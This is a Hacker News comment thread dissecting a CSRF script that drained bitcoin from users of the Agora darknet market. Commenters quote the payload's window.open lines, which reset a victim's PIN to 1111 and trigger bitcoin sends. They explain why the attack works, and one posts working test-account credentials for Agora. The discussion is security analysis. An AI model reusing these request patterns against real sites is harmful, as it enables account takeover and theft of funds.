

CSRF to steal Bitcoins from Agora via email link - zenincognito
http://pastebin.com/WxQyS7zA

======
aakilfernandes
At first I thought this was some crazy low level hack since I saw all the hex
code. But thats just a library used by the hacker (its not really part of the
hack).

Scroll all the way to the bottom and you'll see the meat of it. Its a bunch of
window.opens to certain urls that cause money to be transferred out of the
wallets.

I'm not sure why they use window.open instead of AJAX requests. Is there
something on Tor Browser that would prevent that?

    
    
        window.open (url+"/startresetpin?action=askresetpinaction&controller=user&confirmed=true&confirm-submit=", "_blank");
        window.open (url+"/resetpin?pin1=1111&pin2=1111&submit=Save", "_blank"); 
        window.open (redirectUrl+"?action=send&amount=1&wait=1", "_blank"); 
        window.open (redirectUrl+"?action=send&amount=0.01&wait=2", "_blank");
    

Edit: looks like that library isn't even used by the hack. Maybe its just
there to dissuade onlookers from reading the code.

~~~
dnet
Same Origin Policy would prevent AJAX requests, CSRF attacks thus usually use
hidden forms -- window.open achieves the same, but with the opportunity to
send multiple requests.

~~~
kpcyrd
This isn't the case anymore. Since CORS was introduced, you can send xhr GET
Requests to arbitrary domains.

The browser then checks if the appropriate CORS headers are set. If they are,
you can access the response. If they aren't, you can't.

As a sane developer you are supposed not to trigger ANY actions on a GET
anyway and there are a lot more ways to trigger them, so this is not an issue
in the browser.

For POST and friends it's a bit more complicated, the browser sends an OPTIONS
request first and checks if the CORS headers are set and only if they are, the
actual POST is submitted.

Fun Fact: It looks like it's possible to exploit this issue silently even with
javascript disabled and NoScript installed, it's quite lame to do it the way
they did.

------
PaulSec
Just sends GET requests to bunch of URLs in order to steal your bitcoins. This
attack has been explained and analyzed couple of weeks ago already. Back at
the time, it was about 84 BTC that they tried to launder.

~~~
moeadham
Neat. Do you happen to know the BTC address where it tries to send the funds?

~~~
PaulSec
BTC addresses change all the time and I suspect they are generated randomly as
soon as you reach their page.

------
ajdlinux
I like the inclusion of the AES library's MIT licence terms

~~~
PaulSec
Yeah, completely bullshit, doesn't do anything..

------
celticninja
Can someone explain what this does?

~~~
jawr
The important bit seems to be in `window.onbeforeunload`

Looks like it tries to brute force a pin reset and then attempts to send a
bunch of bitcoin sends.

I'm guessing it depends on the user running on tor and still being logged in
to [http://sydneymfsnkpw7ln.onion](http://sydneymfsnkpw7ln.onion) whatever
that is?

~~~
garrettgrimsley
It doesn't have to brute force the reset because Agora requires knowledge of
neither the current PIN nor the current account password to reset the PIN.

    
    
        window.open (url+"/startresetpin?action=askresetpinaction&controller=user&confirmed=true&confirm-submit=", "_blank")
    

Starts the PIN reset process and

    
    
        window.open (url+"/resetpin?pin1=1111&pin2=1111&submit=Save", "_blank")
    

sets the new PIN. For reference, Agora is lauded as one of the most secure
darknet markets. You can see the lack of CSRF protection for yourself with the
credentials username::password::pin ggHNpinReset::qwertyuiop::1234

